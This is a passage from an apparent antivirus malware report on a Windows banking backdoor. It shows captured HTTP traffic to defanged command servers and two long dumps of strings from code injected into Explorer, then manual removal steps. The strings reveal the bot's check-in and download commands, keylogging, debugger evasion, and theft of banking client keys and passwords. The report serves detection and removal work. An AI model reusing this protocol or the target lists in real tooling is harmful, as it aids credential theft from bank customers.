X-Powered-By: PHP/5.3.10-1ubuntu3.11..Location: hXXp://ww92.xuqufydura
s.eu..Vary: Accept-Encoding......

POST /login.php HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: xuqufyduras.eu

Content-Length: 9

Cache-Control: no-cache

....~7.~'
HTTP/1.1 302 Found

Server: nginx

Date: Fri, 20 Nov 2015 08:21:55 GMT

Content-Type: text/html

Content-Length: 0

Connection: keep-alive

X-Powered-By: PHP/5.4.36-0 deb7u3

Location: hXXp://ww62.xuqufyduras.eu

Vary: Accept-Encoding

HTTP/1.1 302 Found..Server: nginx..Date: Fri, 20 Nov 2015 08:21:55 GMT
..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..
X-Powered-By: PHP/5.4.36-0 deb7u3..Location: hXXp://ww62.xuqufyduras.e
u..Vary: Accept-Encoding..

GET / HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

Host: ww92.novomyfexij.eu

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Fri, 20 Nov 2015 09:09:36 GMT

Server: Apache

Set-Cookie: vsid=914vr1955561764501275; expires=Wed, 18-Nov-2020 09:09:36 GMT; path=/; domain=ww92.novomyfexij.eu; httponly

X-Frame-Options: DENY

X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUDEKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==

Vary: Accept-Encoding,User-Agent

Content-Length: 1686

Keep-Alive: timeout=5, max=96

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8
  <!DOCTYPE html PUBLIC> <html data-adblockkey="MFwwDQYJKoZIh
vcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIccl
v6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUD
EKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==" >
..<head>..    <meta http-equiv="Content-Type" content="text/h
tml; charset=UTF-8">..    <title>ww92.novomyfexij.eu</titl
e>..    <style type="text/css">*{margin:0; padding:0; border:
 0; overflow:hidden} html, body {height: 100%;}</style>..</he
ad>..<body width="100%" height="100%">..<noscript><m
eta http-equiv="refresh" content="0;url=hXXp://imptestrm.com/rg-erdr.p
hp?_dnm=ww92.novomyfexij.eu&_cfrg=1&_drid=as-drid-2396656235494782" /&
gt;<center><p style="padding:1em; font-size:1.5em;">For se
arch results please <a href="hXXp://imptestrm.com/rg-erdr.php?_dnm=
ww92.novomyfexij.eu&_cfrg=1&_drid=as-drid-2396656235494782" style="tex
t-decoration:underline; color:#0000EE;">CLICK HERE</a>.</p
></center></noscript>..<div id="rmgblock" width="100
%" height="100%"></div>..<script type="text/javascript" sr
c="hXXp://imptestrm.com/rg-main.php?folio=9POY552X5&dmn=ww92.novomyfex
ij.eu"></script>..<script type="text/javascript" language=
"JavaScript" src="hXXp://pagead2.googlesyndication.com/apps/domainpark
/show_afd_ads.js"></script>..<script type="text/javascript
"> function collectHeight(){try{var e=Math.max(document.documen<<< skipped >>>

The Backdoor connects to the servers at the folowing location(s):

Explorer.EXE_1572_rwx_01EA0000_000B2000:

.text

`.data

.reloc

`.rdata

@.data

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Explorer.EXE_1572_rwx_02060000_000B8000:

.text

`.rdata

@.data

.reloc

<>http

PASSu98V

PASSu08V

FTPQ

12345678

password1

monkey

monkey1

password

Pname.key

\secrets.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

ollydbg.exe

dumpcap.exe

wireshark.exe

avp.exe

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

sysinfo.log

scr.jpg

minidump.bin

%d.%d.%d.%d

Ý %dh %dm

%s:%d

Software\Microsoft\Internet Explorer\TypedURLs

url%i

4.8.14

%dx%d@%d

%c%d:d

{Windows directory:

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Referer: hXXp://VVV.google.com

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/login.php

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

/search.php

Winmm.dll

Kernel32.dll

Gdi32.dll

ntdll.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

\firefox.exe

keygrab

u.jpg

IprivLibEx.dll

\\.\PhysicalDrive%u

/topic.php

keylog.txt

sniff.log

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

command=config&update_url=

&port=

command=load&url=

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003

hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s

\chrome.exe

\svchost.exe

\opera.exe

\cbmain.ex

\iscc.exe

\clmain.exe

\wclnt.exe

internal_wutex_0xx

%s.dbf

%s.DBF

pop2://%s:%s@%s:%i

pop3://%s:%s@%s:%i

nntp://%s:%s@%s:%i

PTF://%s:%s@%s:%i

PTF://anonymous:

AUTHINFO PASS

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

login=

password=

pass_

ssleay32.dll

advapi32.dll

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.jpg

Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}

Local\{BQQQW777-B777-4e47-8B10-69798A04C732}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

pass.txt

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

cert.pem

Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}

winmm.dll

1.2.5

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

%s\%s

#webcam

#webcam%d

RFB d.d

%s (%s)

d/d/d d:d

password check failed!

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

dbghelp.dll

PSAPI.DLL

NETAPI32.dll

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

WinExec

SetThreadExecutionState

GetWindowsDirectoryA

KERNEL32.dll

GetKeyboardState

MsgWaitForMultipleObjects

GetKeyboardLayoutList

GetAsyncKeyState

GetKeyboardLayout

MapVirtualKeyW

VkKeyScanW

VkKeyScanExW

keybd_event

EnumChildWindows

ActivateKeyboardLayout

SetKeyboardState

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegNotifyChangeKeyValue

RegDeleteKeyA

RegEnumKeyExA

RegOpenKeyExW

RegQueryInfoKeyW

RegEnumKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

gdiplus.dll

MSVCRT.dll

AVICAP32.dll

MSVFW32.dll

ShellExecuteW

GetProcessHeap

?456789:;<=

!"#$%&'()* ,-./0123

;3 #>6.&

'2, / 0&7!4-)1#

SYSTEM!XP10!F9BE9A8A

%WinDir%\apppatch\jsvlax.exe

%Documents and Settings%\%current user%\Application Data\

5`6C6Q6}6

;";,;6;<;_;{;

6&7-737<7|7

3"33393>3}3

;#;);/;=;

<"=3=9=>=}=

:(:-:8:=:

7#7)7/7=7

9&9,929@9

0!02090>0

>$>*>4>9>

`.data

Windows Explorer

mavast.com

ya.ru

serverkey.dat

\windows\

dntdll.dll

.NET CLR Networking_Perf_Library_Lock_PID_0

.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0

ASP.NET_2.0.50727_Perf_Library_Lock_PID_0

SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d

Software\Microsoft\Windows\CurrentVersion\Internet Settings

iexplore.exe

HighMemoryEvent_x

MSCTF.Shared.MAPPING.x

MSCTF.Shared.EVENT.x

MSCTF.Shared.MUTEX.x

.Prev

.current

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

%original file name%.exe:1616
Delete the original Backdoor file.
Delete or disinfect the following files created/modified by the Backdoor:

%System%\config\software (3251 bytes)
%System%\config\SOFTWARE.LOG (5347 bytes)
%WinDir%\AppPatch\jsvlax.exe (1951 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.